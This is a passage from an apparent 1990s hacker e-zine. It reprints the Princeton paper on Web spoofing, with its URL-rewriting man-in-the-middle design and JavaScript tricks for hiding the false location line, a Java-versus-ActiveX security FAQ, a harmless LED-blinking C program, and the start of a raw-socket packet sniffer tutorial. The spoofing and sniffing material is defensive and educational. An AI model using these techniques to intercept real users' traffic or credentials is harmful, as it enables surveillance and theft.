impression about where the page came from; for example, the presence of a corporate logo implies that the page originated at a certain corporation. The appearance of an object might convey a certain impression; for example, neon green text on a purple background probably came from Wired magazine. You might think you're dealing with a popup window when what you are seeing is really just a rectangle with a border and a color different from the surrounding parts of the screen. Particular graphical items like file-open dialog boxes are immediately recognized as having a certain purpose. Experienced Web users react to such cues in the same way that experienced drivers react to stop signs without reading them. The names of objects can convey context. People often deduce what is in a file by its name. Is manual.doc the text of a user manual? (It might be another kind of document, or it might not be a document at all.) URLs are another example. Is MICR0S0FT.COM the address of a large software company? (For a while that address pointed to someone else entirely. By the way, the round symbols in MICR0S0FT here are the number zero, not the letter O.) Was dole96.org Bob Dole's 1996 presidential campaign? (It was not; it pointed to a parody site.) People often get context from the timing of events. If two things happen at the same time, you naturally think they are related. If you click over to your bank's page and a username/password dialog box appears, you naturally assume that you should type the name and password that you use for the bank. If you click on a link and a document immediately starts downloading, you assume that the document came from the site whose link you clicked on. Either assumption could be wrong. If you only see one browser window when an event occurs, you might not realize that the event was caused by another window hiding behind the visible one. Modern user-interface designers spend their time trying to devise contextual cues that will guide people to behave appropriately, even if they do not explicitly notice the cues. While this is usually beneficial, it can become dangerous when people are accustomed to relying on context that is not always correct. TCP and DNS Spoofing Another class of spoofing attack, which we will not discuss here, tricks the user's software into an inappropriate action by presenting misleading information to that software [3]. Examples of such attacks include TCP spoofing [4], in which Internet packets are sent with forged return addresses, and DNS spoofing [5], in which the attacker forges information about which machine names correspond to which network addresses. These other spoofing attacks are well known, so we will not discuss them further. Web Spoofing Web spoofing is a kind of electronic con game in which the attacker creates a convincing but false copy of the entire World Wide Web. The false Web looks just like the real one: it has all the same pages and links. However, the attacker controls the false Web, so that all network traffic between the victim's browser and the Web goes through the attacker. Consequences Since the attacker can observe or modify any data going from the victim to Web servers, as well as controlling all return traffic from Web servers to the victim, the attacker has many possibilities. These include surveillance and tampering. Surveillance The attacker can passively watch the traffic, recording which pages the victim visits and the contents of those pages. When the victim fills out a form, the entered data is transmitted to a Web server, so the attacker can record that too, along with the response sent back by the server. Since most on-line commerce is done via forms, this means the attacker can observe any account numbers or passwords the victim enters. As we will see below, the attacker can carry out surveillance even if the victim has a "secure" connection (usually via Secure Sockets Layer) to the server, that is, even if the victim's browser shows the secure-connection icon (usually an image of a lock or a key). Tampering The attacker is also free to modify any of the data traveling in either direction between the victim and the Web. The attacker can modify form data submitted by the victim. For example, if the victim is ordering a product on-line, the attacker can change the product number, the quantity, or the ship-to address. The attacker can also modify the data returned by a Web server, for example by inserting misleading or offensive material in order to trick the victim or to cause antagonism between the victim and the server. Spoofing the Whole Web You may think it is difficult for the attacker to spoof the entire World Wide Web, but it is not. The attacker need not store the entire contents of the Web. The whole Web is available on-line; the attacker's server can just fetch a page from the real Web when it needs to provide a copy of the page on the false Web. How the Attack Works The key to this attack is for the attacker's Web server to sit between the victim and the rest of the Web. This kind of arrangement is called a "man in the middle attack" in the security literature. URL Rewriting The attacker's first trick is to rewrite all of the URLs on some Web page so that they point to the attacker's server rather than to some real server. Assuming the attacker's server is on the machine www.attacker.org, the attacker rewrites a URL by adding http://www.attacker.org to the front of the URL. For example, http://home.netscape.com becomes http://www.attacker.org/http://home.netscape.com. (The URL rewriting technique has been used for other reasons by two other Web sites, the Anonymizer and the Zippy filter. See page 9 for details.) Figure 1 shows what happens when the victim requests a page through one of the rewritten URLs. The victim's browser requests the page from www.attacker.org, since the URL starts with http://www.attacker.org. The remainder of the URL tells the attacker's server where on the Web to go to get the real document. Figure 1: An example Web transaction during a Web spoofing attack. The victim requests a Web page. The following steps occur: (1) the victim's browser requests the page from the attacker's server; (2) the attacker's server requests the page from the real server; (3) the real server provides the page to the attacker's server; (4) the attacker's server rewrites the page; (5) the attacker's server provides the rewritten version to the victim. Once the attacker's server has fetched the real document needed to satisfy the request, the attacker rewrites all of the URLs in the document into the same special form by splicing http://www.attacker.org/ onto the front. Then the attacker's server provides the rewritten page to the victim's browser. Since all of the URLs in the rewritten page now point to www.attacker.org, if the victim follows a link on the new page, the page will again be fetched through the attacker's server. The victim remains trapped in the attacker's false Web, and can follow links forever without leaving it. Forms If the victim fills out a form on a page in a false Web, the result appears to be handled properly. Spoofing of forms works naturally because forms are integrated closely into the basic Web protocols: form submissions are encoded in URLs and the replies are ordinary HTML Since any URL can be spoofed, forms can also be spoofed. When the victim submits a form, the submitted data goes to the attacker's server. The attacker's server can observe and even modify the submitted data, doing whatever malicious editing desired, before passing it on to the real server. The attacker's server can also modify the data returned in response to the form submission. "Secure" connections don't help One distressing property of this attack is that it works even when the victim requests a page via a "secure" connection. If the victim does a "secure" Web access ( a Web access using the Secure Sockets Layer) in a false Web, everything will appear normal: the page will be delivered, and the secure connection indicator (usually an image of a lock or key) will be turned on. The victim's browser says it has a secure connection because it does have one. Unfortunately the secure connection is to www.attacker.org and not to the place the victim thinks it is. The victim's browser thinks everything is fine: it was told to access a URL at www.attacker.org so it made a secure connection to www.attacker.org. The secure-connection indicator only gives the victim a false sense of security. Starting the Attack To start an attack, the attacker must somehow lure the victim into the attacker's false Web. There are several ways to do this. An attacker could put a link to a false Web onto a popular Web page. If the victim is using Web-enabled email, the attacker could email the victim a pointer to a false Web, or even the contents of a page in a false Web. Finally, the attacker could trick a Web search engine into indexing part of a false Web. Completing the Illusion The attack as described thus far is fairly effective, but it is not perfect. There is still some remaining context that can give the victim clues that the attack is going on. However, it is possible for the attacker to eliminate virtually all of the remaining clues of the attack's existence. Such evidence is not too hard to eliminate because browsers are very customizable. The ability of a Web page to control browser behavior is often desirable, but when the page is hostile it can be dangerous. The Status Line The status line is a single line of text at the bottom of the browser window that displays various messages, typically about the status of pending Web transfers. The attack as described so far leaves two kinds of evidence on the status line. First, when the mouse is held over a Web link, the status line displays the URL the link points to. Thus, the victim might notice that a URL has been rewritten. Second, when a page is being fetched, the status line briefly displays the name of the server being contacted. Thus, the victim might notice that www.attacker.org is displayed when some other name was expected. The attacker can cover up both of these cues by adding a JavaScript program to every rewritten page. Since JavaScript programs can write to the status line, and since it is possible to bind JavaScript actions to the relevant events, the attacker can arrange things so that the status line participates in the con game, always showing the victim what would have been on the status line in the real Web. Thus the spoofed context becomes even more convincing. The Location Line The browser's location line displays the URL of the page currently being shown. The victim can also type a URL into the location line, sending the browser to that URL. The attack as described so far causes a rewritten URL to appear in the location line, giving the victim a possible indication that an attack is in progress. This clue can be hidden using JavaScript. A JavaScript program can hide the real location line and replace it by a fake location line which looks right and is in the expected place. The fake location line can show the URL the victim expects to see. The fake location line can also accept keyboard input, allowing the victim to type in URLs normally. Typed-in URLs can be rewritten by the JavaScript program before being accessed. Viewing the Document Source There is one clue that the attacker cannot eliminate, but it is very unlikely to be noticed. By using the browser's "view source" feature, the victim can look at the HTML source for the currently displayed page. By looking for rewritten URLs in the HTML source, the victim can spot the attack. Unfortunately, HTML source is hard for novice users to read, and very few Web surfers bother to look at the HTML source for documents they are visiting, so this provides very little protection. A related clue is available if the victim chooses the browser's "view document information" menu item. This will display information including the document's real URL, possibly allowing the victim to notice the attack. As above, this option is almost never used so it is very unlikely that it will provide much protection. Bookmarks There are several ways the victim might accidentally leave the attacker's false Web during the attack. Accessing a bookmark or jumping to a URL by using the browser's "Open location" menu item might lead the victim back into the real Web. The victim might then reenter the false Web by clicking the "Back" button. We can imagine that the victim might wander in and out of one or more false Webs. Of course, bookmarks can also work against the victim, since it is possible to bookmark a page in a false Web. Jumping to such a bookmark would lead the victim into a false Web again. Tracing the Attacker Some people have suggested that this attack can be deterred by finding and punishing the attacker. It is true that the attacker's server must reveal its location in order to carry out the attack, and that evidence of that location will almost certainly be available after an attack is detected. Unfortunately, this will not help much in practice because attackers will break into the machine of some innocent person and launch the attack there. Stolen machines will be used in these attacks for the same reason most bank robbers make their getaways in stolen cars. Remedies Web spoofing is a dangerous and nearly undetectable security attack that can be carried out on today's Internet. Fortunately there are some protective measures you can take. Short-term Solution In the short run, the best defense is to follow a three-part strategy: 1.disable JavaScript in your browser so the attacker will be unable to hide the evidence of the attack; 2.make sure your browser's location line is always visible; 3.pay attention to the URLs displayed on your browser's location line, making sure they always point to the server you think you're connected to. This strategy will significantly lower the risk of attack, though you could still be victimized if you are not conscientious about watching the location line. At present, JavaScript, ActiveX, and Java all tend to facilitate spoofing and other security attacks, so we recommend that you disable them. Doing so will cause you to lose some useful functionality, but you can recoup much of this loss by selectively turning on these features when you visit a trusted site that requires them. Long-term Solution We do not know of a fully satisfactory long-term solution to this problem. Changing browsers so they always display the location line would help, although users would still have to be vigilant and know how to recognize rewritten URLs. For pages that are not fetched via a secure connection, there is not much more that can be done. For pages fetched via a secure connection, an improved secure-connection indicator could help. Rather than simply indicating a secure connection, browsers should clearly say who is at the other end of the connection. This information should be displayed in plain language, in a manner intelligible to novice users; it should say something like "Microsoft Inc." rather than "www.microsoft.com." Every approach to this problem seems to rely on the vigilance of Web users. Whether we can realistically expect everyone to be vigilant all of the time is debatable. Related Work We did not invent the URL rewriting technique. Previously, URL rewriting has been used as a technique for providing useful services to people who have asked for them. We know of two existing services that use URL rewriting. The Anonymizer, written by Justin Boyan at Carnegie Mellon University, is a service that allows users to surf the Web without revealing their identities to the sites they visit. The Zippy filter, written by Henry Minsky, presents an amusing vision of the Web with Zippy-the-Pinhead sayings inserted at random. Though we did not invent URL rewriting, we believe we are the first to realize its full potential as one component of a security attack. Acknowledgments The URL-rewriting part of our demonstration program is based on Henry Minsky's code for the Zippy filter. We are grateful to David Hopwood for useful discussions about spoofing attacks, and to Gary McGraw and Laura Felten for comments on drafts of this paper. The figure was designed by Gary McGraw. For More Information More information is available from our Web page at http://www.cs.princeton.edu/sip, or from Prof. Edward Felten at felten@cs.princeton.edu or (609) 258-5906. References [1] Peter G. Neumann. Computer-Related Risks. ACM Press, New York, 1995. [2] Gary McGraw and Edward W. Felten. Java Security: Hostile Applets, Holes and Antidotes. John Wiley and Sons, New York, 1996. [3] Robert T. Morris. A Weakness in the 4.2BSD UNIX TCP/IP Software. Computing Science Technical Report 117, AT&T Bell Laboratories, February 1985. [4] Steven M. Bellovin. Security Problems in the TCP/IP Protocol Suite. Computer Communications Review 19(2):32-48, April 1989. [5] Steven M. Bellovin. Using the Domain Name System for System Break-ins. Proceedings of Fifth Usenix UNIX Security Symposium, June 1995. [6] Web site at http://www.anonymizer.com [7] Web site at http://www.metahtml.com/apps/zippy/welcome.html @HWA 06.0 What should I fear from Java and ActiveX? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Security Tradeoffs: Java vs. ActiveX An Unofficial View from the Princeton Secure Internet Programming Team Last modified: Mon Apr 28 00:07:39 EDT 1997 + What are Java and ActiveX? Java and ActiveX are two systems that let people attach computer programs to Web pages. People like these systems because they allow Web pages to be much more dynamic and interactive than they could be otherwise. However, Java and ActiveX do introduce some security risk, because they can cause potentially hostile programs to be automatically downloaded and run on your computer, just because you visited some Web page. The downloaded program could try to access or damage the data on your machine, for example to insert a virus. Both Java and ActiveX take measures to protect your from this risk. There has been a lot of public debate over which system offers better security. This page gives our opinion on this debate. Java and ActiveX take fundamentally different approaches to security. We will concentrate on comparing the approaches, rather than critiquing the details of the two systems. After all, details can be fixed. + Who are the players? Java was developed by JavaSoft, a division of Sun Microsystems. Java is supported by both of the major browsers, Netscape Navigator and Microsoft Internet Explorer. ActiveX was developed by Microsoft. It is supported in Microsoft's Internet Explorer, and an ActiveX plug-in is available for Netscape Navigator. The most intense public debate about security has been between JavaSoft and Microsoft. Each company has accused the other of being careless about security, and some misleading charges have been made. + How does security work in ActiveX? ActiveX security relies entirely on human judgement. ActiveX programs come with digital signatures from the author of the program and anybody else who chooses to endorse the program. Think of a digital signature as being like a person's signature on paper. Your browser can look at a digital signature and see whether it is genuine, so you can know for sure who signed a program. (That's the theory, at least. Things don't always work out so neatly in practice.) Once your browser has verified the signatures, it tells you who signed the program and asks you whether or not to run it. You have two choices: either accept the program and let it do whatever it wants on your machine, or reject it completely. ActiveX security relies on you to make correct decisions about which programs to accept. If you accept a malicious program, you are in big trouble. + How does security work in Java? Java security relies entirely on software technology. Java accepts all downloaded programs and runs them within a security "sandbox". Think of the sandbox as a security fence that surrounds the program and keeps it away from your private data. As long as there are no holes in the fence, you are safe. Java security relies on the software implementing the sandbox to work correctly. + How can ActiveX security break down? The main danger in ActiveX is that you will make the wrong decision about whether to accept a program. One way this can happen is that some person you trust turns out not to deserve that trust. The most dangerous situation, though, is when the program is signed by someone you don't know anything about. You'd really like to see what this program does, but if you reject it you won't be able to see anything. So you rationalize: the odds that this particular program is hostile are very small, so why not go ahead and accept it? After all, you accepted three programs yesterday and nothing went wrong. It's just human nature to accept the program. Even if the risk of accepting one program is low, the risk adds up when you repeatedly accept programs. And when you do get the one bad program, there is no limit on how much damage it can do. The only way to avoid this scenario is to refuse all programs, no matter how fun or interesting they sound, except programs that come from a few people you know well. Who has the self-discipline to do that? + How can Java security break down? The main danger in Java comes from the complexity of the software that implements the sandbox. Common sense says that complicated technology is more likely to break down than simple technology. Java is pretty complicated, and several breakdowns have happened in the past. If you're the average person, you don't have the time or the desire to examine Java and look for implementation errors. So you have to hope the implementers did everything right. They're smart and experienced and motivated, but that doesn't make them infallible. When Java security does break down, the potential consequences are just as bad as those of an ActiveX problem: a hostile program can come to your machine and access your data at will. + What about "signed applets" in Java? One problem with the original version of Java is that the "sandbox" can be too restrictive. For example, Java programs are not allowed to access files, so there's no way to write a text editor. (What good is editing if you can't save your work?) Java-enabled products are now starting to use digital signatures to work around this problem. The idea is like ActiveX: programs are digitally signed and you can decide, based on the signature, to give a program more power than it would otherwise have. This lets you run a text editor program if you decide that you trust its author. The downside of this scheme is that it introduces some of the ActiveX problems. If you make the wrong decision about who to trust, you could be very sorry. There's no known way to get around this dilemma. Some kinds of programs must be given power in order to be useful, and there's no ironclad guarantee that those programs will be well-behaved. Still, Java with signed applets does offer some advantages over ActiveX. You can put only partial trust in a program, while ActiveX requires either full trust or no trust at all. And a Java-enabled browser could keep a record of which dangerous operations are carried out by each trusted program, so it would be easier to reconstruct what happened if anything went wrong. (Current browsers don't do this record-keeping, but we wish they would.) Finally, Java offers better protection against accidental damage caused by buggy programs. + What about plug-ins? Plug-ins are a method for adding code to your browser. Plug-ins have the same security model as ActiveX: when you download a plug-in, you are trusting it to be harmless. All of the warnings about ActiveX programs apply to plug-ins too. + Can I be hurt by a "good" plug-in or ActiveX program? Unfortunately, yes. This depends entirely on what the plug-in or program does. Many plug-ins such as Macromedia's Shockwave or Sun's Safe-Tcl are actually completely general programming systems, just like Java. By accepting a plug-in like this, you're trusting that the plug-in program has no security-relevant bugs. As we have seen with Java, systems that are meant to be secure often have bugs that lead to security problems. With ActiveX, this problem is made worse if you click the box which accepts all programs signed by the same person (for example, if you accept anything signed by Microsoft). While one Microsoft program may be secure, another one may have a security-relevant bug. This problem even applies to code written by your own company for internal use. Once the plug-in or program is installed in your browser, an external attacker (who knew about the program) could write a Web page which used your internal program bug passed it funny data which corrupted the program and took over your machine. If you're feeling paranoid, the only plug-ins you should allow are those with less than general purpose functionality. A plug-in which handles a new image, video, or audio format is less likely to be exploitable than a plug-in for a completely general animation system. + This sounds pretty scary. How worried should I be? The good news is that there have been few incidents of people being damaged by hostile Java or ActiveX programs. The reason is simply that the people with the skills to create malicious programs have chosen not to do so. For most people, continuing to use Java and ActiveX is the right choice. If you are informed about the risks, you can make a rational decision to accept some danger in exchange for the benefits of using Java and ActiveX. + How can I lower my risk? There are several things you can do. + Think very carefully before accepting a digitally signed program. How competent and trustworthy is the signer? Use up-to-date browser versions, and install the security patches offered by your browser vendor. Never surf the Web on a computer that contains highly sensitive information like medical records. DISCLAIMER: This information is our opinion only. It is not the opinion of Princeton University or of our research sponsors. We do not and cannot guarantee that you will be safe if you follow our advice. Copyright © 1997 by Edward W. Felten Princeton University Department of Computer Science Contact: sip@cs.princeton.edu @HWA 07.0 Some cool geek code (leetbuzz.c) to roll your led's from a suid root acct... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * leetbuzz.c - buzzes your scr/lck led in a leet fashion * derived from heartbeat.c by alessandro rubini (your book's just best :) * * this little program will attract some geek eyes at the next hack event * for sure ;-) * * by scut * * must be executed as suid root, fortunatly * * compile with: gcc -o leetbuzz leetbuzz.c -lm * * tested with 2.[02].x on alpha, sparc and x86 */ #define LB_SHUTTER 32 // #define LB_MODE_ALT #include #include #include #include #include #include #include #include #include #include #include #include #include int consolefd; char flasher[LB_SHUTTER]; void led_runthru(char *, int, unsigned long); void led_doshutter(char *, int); int led_sinewave(int); int led_init(void); void led_uninit(void); void led_set(void); void led_unset(void); int led_change(void); int main(int argc, char **argv) { if (led_init() == 0) { fprintf(stderr, "cannot open tty, lammah\n"); exit(1); } for (;;) { led_sinewave(5); led_runthru(flasher, LB_SHUTTER, 5000); } exit(0); /* never happen */ } /* runs through our neat array */ void led_runthru(char *p_array, int max, unsigned long waitdigit) { struct timeval st; struct timeval ct; int n; for (n = 0; n < max; n++) { if (gettimeofday(&st, NULL) == -1) return; if (p_array[n] == '\x00') { led_unset(); } else if (p_array[n] == '\x01') { led_set(); } if (gettimeofday(&ct, NULL) == -1) return; while ((((ct.tv_sec * 1000000) + ct.tv_usec) - ((st.tv_sec * 1000000) + st.tv_usec)) < waitdigit) gettimeofday(&ct, NULL); } return; } /* little bresenham hack to stretch our intensity */ void led_doshutter(char *p_array, int intensity) { int n = 0; float e; int x, y; if (intensity > LB_SHUTTER) return; for (y = x = 0; x < LB_SHUTTER; x++) { e = y - ((x * intensity) / LB_SHUTTER); if (e < 0) { e *= -1; } if (e <= 0.5) { p_array[x] = '\x00'; } else { p_array[x] = '\x01'; y++; } } #ifdef DEBUG for (x = 0; x < LB_SHUTTER; x++) printf("%c", (p_array[x]) ? 'X' : ' '); printf("\n"); #endif return; } /* tells wether the led should be active (1) or not (0) for sinewave * with period (in seconds) * first call -> init * period = 0 -> init */ int led_sinewave(int period) { static struct timeval *st = NULL; static struct timeval *ct = NULL; double t_f; unsigned long long st_usec; unsigned long long ct_usec; unsigned long long td; /* new init ? */ if (period == 0) { free(st); st = NULL; } if (st == NULL) { st = calloc(1, sizeof(struct timeval)); if (gettimeofday(st, NULL) == -1) { fprintf(stderr, "cannot get time of day for st :)\n"); exit(1); } } if (period == 0) return (0); if (ct == NULL) { ct = calloc(1, sizeof(struct timeval)); } /* get current time and then compare */ if (gettimeofday(ct, NULL) == -1) { fprintf(stderr, "cannot get time of day for ct :)\n"); exit(1); } st_usec = (st->tv_sec * 1000000) + st->tv_usec; ct_usec = (ct->tv_sec * 1000000) + ct->tv_usec; td = ct_usec - st_usec; /* difference */ /* compute relative period, then compute sine value */ td = (td % (period * 1000000)); t_f = (double)(td / (double)(period * 1000000)); t_f *= 2 * M_PI; /* yeah, i like math.h */ #ifdef LB_MODE_ALT t_f = ((sin(t_f) + 1) / 3) + 0.3; #else t_f = (sin(t_f) + 1) / 2; /* we don't need negative LEDs */ #endif #ifdef DEBUG printf("%3.5f : ", t_f); #endif led_doshutter(flasher, (int)(t_f * LB_SHUTTER)); return(1); } int led_init(void) { consolefd = open("/dev/tty0", O_RDONLY); if (consolefd == -1) return(0); return(1); } void led_uninit(void) { close(consolefd); return; } void led_set(void) { char led; ioctl(consolefd, KDSETLED, 1); return; } void led_unset(void) { char led; ioctl(consolefd, KDSETLED, 0); return; } int led_change(void) { char led; if (ioctl(consolefd, KDGETLED, &led) != -1) { ioctl(consolefd, KDSETLED, (led == 1) ? 0 : 1); } return(led); } @HWA 08.0 Building a packet sniffer from the ground up Part I ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Basic Packet-Sniffer Construction from the Ground Up Part 1 by Chad Renfro raw_sock@hotmail.com Packet sniffers are applications used by network administrators to monitor and validate network traffic. Sniffers are programs used to read packets that travel across the network at various levels of the OSI layer. And like most security tools sniffers too can be used for both good and destructive purposes. On the light-side of network administration sniffers help quickly track down problems such as bottlenecks and misplaced filters. However on the dark-side sniffers can be used to reap tremendous amounts of havoc by gathering legitimate user names and passwords so that other machines can be quickly compromised. Hopefully this paper will be used to help administrators gain control of their networks by being able to analyze network traffic not only by using preconstructed sniffers but by being able to create their own. This paper will look at the packet sniffer from the bottem up, looking in depth at the sniffer core and then gradualy adding functionality to the application. The example included here will help illustrate some rather cumbersome issues when dealing with network programing. In no way will this single paper teach a person to write a complete sniffing application like tcpdump or sniffit. It will however teach some very fundamental issues that are inherent to all packet sniffers. Like how the packets are accessed on the network and how to work with the packets at different layers. The most basic sniffer... Sniffer #1. This sniffer will illustrate the use of the SOCK_RAW device and show how to gather packets from the network and print out some simple header information to std_out. Although the basic premise is that packet sniffers operate in a promiscuous mode which listens to all packets weather or not the packet is destined for the machines mac address, this example will collect packets in a non-promiscuous mode . This will let usconcentrate on the SOCK_RAW device for the first example. To operate this same code in a promiscous mode the network card may be put in a promiscous mode manually. To do this type this in after the log in : > su - Password : ******** # ifconfig eth0 promisc This will now set the network interface eth0 in promiscous mode. /************************simple_Tcp_sniff.c********************/ 1. #include 2. #include 3. #include 4. #include 5. #include "headers.h" 6. int main() 7. { 8. int sock, bytes_recieved, fromlen; 9. char buffer[65535]; 10. struct sockaddr_in from; 11. struct ip *ip; 12. struct tcp *tcp; 13. 14. sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); 15. while(1) 16. { 17. fromlen = sizeof from; 18. bytes_recieved = recvfrom(sock, buffer, sizeof buffer, 0, (struct sockaddr *)&from, &fromlen); 19. printf("\nBytes received ::: %5d\n",bytes_recieved); 20. printf("Source address ::: %s\n",inet_ntoa(from.sin_addr)); 21. ip = (struct ip *)buffer; 22. printf("IP header length ::: %d\n",ip->ip_length); 23. printf("Protocol ::: %d\n",ip->ip_protocol); 24. tcp = (struct tcp *)(buffer + (4*ip->ip_length)); 25. printf("Source port ::: %d\n",ntohs(tcp->tcp_source_port); 26. printf("Dest port ::: %d\n",ntohs(tcp->tcp_dest_port)); 27. } 28. } /***********************EOF**********************************/ What this means : Line 1-4 : These are the header files required to use some needed c functions we will use later = functions like printf and std_out = this will give access to the SOCK_RAW and the IPPROTO_TCP defines = structs like the sockaddr_in = lets us use the functions to do network to host byte order conversions line 5 : This is the header file headers.h that is also included with this program to give standard structures to access the ip and tcp fields. The structures identify each field in the ip and tcp header for instance : struct ip { unsigned int ip_length:4; /* length of ip-header in 32-bit words*/ unsigned int ip_version:4; /* set to "4", for Ipv4 */ unsigned char ip_tos; /* type of service*/ unsigned short ip_total_length; /* Total length of ip datagram in bytes */ unsigned short ip_id; /*identification field*/ unsigned short ip_flags; unsigned char ip_ttl; /*time-to-live, sets upper limit for max number of routers to go through before the packet is discarded*/ unsigned char ip_protocol; /*identifies the correct transport protocol */ unsigned short ip_cksum; /*calculated for the ip header ONLY*/ unsigned int ip_source; /*source ip */ unsigned int ip_dest; /*dest ip*/ }; struct tcp { unsigned short tcp_source_port; /*tcp source port*/ unsigned short tcp_dest_port; /*tcp dest port*/ unsigned int tcp_seqno; /*tcp sequence number, identifies the byte in the stream of data*/ unsigned int tcp_ackno; /*contains the next seq num that the sender expects to recieve*/ unsigned int tcp_res1:4, /*little-endian*/ tcp_hlen:4, /*length of tcp header in 32-bit words*/ tcp_fin:1, /*Finish flag "fin"*/ tcp_syn:1, /*Synchronize sequence numbers to start a connection tcp_rst:1, /*Reset flag */ tcp_psh:1, /*Push, sends data to the application*/ tcp_ack:1, /*acknowledge*/ tcp_urg:1, /*urgent pointer*/ tcp_res2:2; unsigned short tcp_winsize; /*maxinum number of bytes able to recieve*/ unsigned short tcp_cksum; /*checksum to cover the tcp header and data portion of the packet*/ unsigned short tcp_urgent; /*vaild only if the urgent flag is set, used to transmit emergency data */ }; line 8-13 : This is the variable declaration section integers : sock = socket file descriptor bytes_recieved = bytes read from the open socket "sock" fromlen = the size of the from structure char : buffer = where the ip packet that is read off the wire will be held buffer will hold a datagram of 65535 bytes which is the maximum length of an ip datagram. Struct sockaddr_in : struct sockaddr_in { short int sin_family; /* Address family */ unsigned short int sin_port; /* Port number */ struct in_addr sin_addr; /* Internet address */ unsigned char sin_zero[8]; /* Same size as struct sockaddr */ }; Before we go any further two topics should be covered,byte-ordering and sockaddr structures. Byte-ordering,is the way that the operating system stores bytes in memory. There are two ways that this is done first with the low-order byte at the starting address this is known as "little-endian" or host-byte order. Next bytes can be stored with the high order byte at the starting address, this is called "big-endian" or network byte order. The Internet protocol uses >>>>>> network byte order. This is important because if you are working on an intel based linux box you will be programming on a little-endian machine and to send data via ip you must convert the bytes to network-byte order. For examle lets say we are going to store a 2-byte number in memory say the value is (in hex) 0x0203 First this is how the value is stored on a big-endian machine: ___________ | 02 | 03 | |_____|_____| address: 0 1 And here is the same value on a little-endian machine: ___________ |03 | 02 | |_____|_____| address: 1 0 The same value is being represented in both examples it is just how we order the bytes that changes. The next topic that you must understand is the sockaddr vs. the sockaddr_in structures. The struct sockaddr is used to hold information about the socket such as the family type and other address information it looks like : struct sockaddr { unsigned short sa_family; /*address family*/ char sa_data[14]; /*address data*/ }; The first element in the structure "sa_family" will be used to reference what the family type is for the socket, in our sniffer it will be AF_INET. Next the "sa_data" element holds the destination port and address for the socket. To make it easier to deal with the sockaddr struct the use of the sockaddr_in structure is commonly used. Sockaddr_in makes it easier to reference all of the elements that are contained by sockaddr. Sockaddr_in looks like: struct sockaddr_in { short int sin_family; /* Address family */ unsigned short int sin_port; /* Port number */ struct in_addr sin_addr; /* Internet address */ unsigned char sin_zero[8]; /* Same size as struct sockaddr */ }; We will use this struct and declare a variable "from" which will give us the information on the packet that we will collect from the raw socket. For instance the var "from.sin_addr" will give access to the packets source address (in network byte order). The thing to mention here is that all items in the sockaddr_in structure must be in network-byte order. When we receive the data in the sockaddr_in struct we must then convert it back to Host-byte order. To do this we can use some predefined functions to convert back and forth between host and network byteorder. Here are the functions we will use: ntohs : this function converts network byte order to host byte order for a 16-bit short ntohl : same as above but for a 32-bit long inet_ntoa : this function converts a 32-bit network binary value to a dotted decimal ip address inet_aton : converts a character string address to the 32-bit network binary value inet_addr : takes a char string dotted decimal addr and returns a 32-bit network binary value To further illustrate ,say I want to know the port number that this packet originated from: int packet_port; packet_port =ntohs(from.sin_port); ^^^^^ If I want the source IP address of the packet we will use a special function to get it to the 123.123.123.123 format: char *ip_addr; ip_addr =inet_ntoa(from.sin_addr) ^^^^^^^^^ line 11-12: struct ip *ip : struct tcp *tcp : This is a structure that we defined in our header file "headers.h". This structure is declared so that we can access individual fields of the ip/tcp header. The structure is like a transparent slide with predefined fields drawn on it. When a packet is taken off the wire it is a stream of bits, to make sense of it the "transparency" (or cast) is laid on top of or over the bits so the individual fields can be referenced. Line 14 : sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); This is the most important line in the entire program. Socket() takes three arguments in this form: sockfd = socket(int family, int type, int protocol); The first argument is the family. This could be either AF_UNIX which is used so a process can communicate with another process on the same host or AF_INET which is used for internet communication between remote hosts. In this case it will be AF_INET . Next is the type, the type is usually between 1 of 4 choices (there are others that we will not discuss here) the main four are : 1. SOCK_DRAM : used for udp datagrams 2. SOCK_STREAM : used for tcp packets 3. SOCK_RAW : used to bypass the transport layer and directly access the IP layer 4. SOCK_PACKET : this is linux specific, it is similuar to SOCK_RAW except it accesses the DATA LINK Layer For our needs we will use the SOCK_RAW type. You must have root acces to open a raw socket. The last parameter is the protocol,the protocol value specifies what type of traffic the socket should receive , for normal sockets this value is usally set to "0" because the socket can figure out if for instance the "type" of SOCK_DGRAM is specified then the protocol should be UDP.In our case we just want to look at tcp traffic so we will specify IPPROTO_TCP. line 15 : while (1) The while (1) puts the program into an infinite loop this is necessary so that after the first packet is processed we will loop around and grab the next. Line 18: bytes_recieved = recvfrom(sock, buffer, sizeof buffer, 0, (struct sockaddr *)&from, &fromlen); Now here is where we are actually reading data from the open socket "sock".The from struct is also filled in but notice that we are casting "from" from a "sockaddr_in" struct to a "sockaddr" struct. We do this because the recvfrom() requires a sockaddr type but to access the separate fields we will continue to use the sockaddr_in structure. The length of the "from" struct must also be present and passed by address. The recvfrom() call will return the number of bytes on success and a -1 on error and fill the global var errno. This is what we call "blocking-I/O" the recvfrom() will wait here forever until a datagram on the open socket is ready to be processed. This is opposed to Non-blocking I/O which is like running a process in the background and move on to other tasks. Line 20: printf("Source address ::: %s\n",inet_ntoa(from.sin_addr)); This printf uses the special function inet_ntoa() to take the value of "from.sin_addr" which is stored in Network-byte order and outputs a value in a readable ip form such as 192.168.1.XXX. Line 21: ip = (struct ip *)buffer; This is where we will overlay a predefined structure that will help us to individually identify the fields in the packet that we pick up from the open socket. Line 22: printf("IP header length ::: %d\n",ip->ip_length); The thing to notice on this line is the "ip->ip_length" this will access a pointer in memory to the ip header length the important thing to remember is that the length will be represented in 4-byte words this will be more important later when trying to access items past the ip header such as the tcp header or the data portion of the packet. Line 23: printf("Protocol ::: %d\n",ip->ip_protocol); This gives access to the type of protocol such as 6 for tcp or 17 for udp. Line 24: tcp = (struct tcp *)(buffer + (4*ip->ip_length)); Remember earlier it was mentioned that the ip header length is stored in 4 byte words, this is where that bit of information becomes important. Here we are trying to get access to the tcp header fields, to do this we must overlay a structure that has the fields predefined just as we did with ip. There is one key difference here the ip header fields were easy to access due to the fact that the beginning of the buffer was also the beginning of the ip header as so : |----------------- buffer ----------------| _________________________________________ | ip header | | |____________________|____________________| ^ *ip ^ *buffer So to get access to the ip header we just set a pointer casted as an ip structure to the beginning of the buffer like "ip = (struct ip *)buffer;". To get access to the tcp header is a little more difficult due to the fact that we must set a pointer and cast it as a tcp structure at the 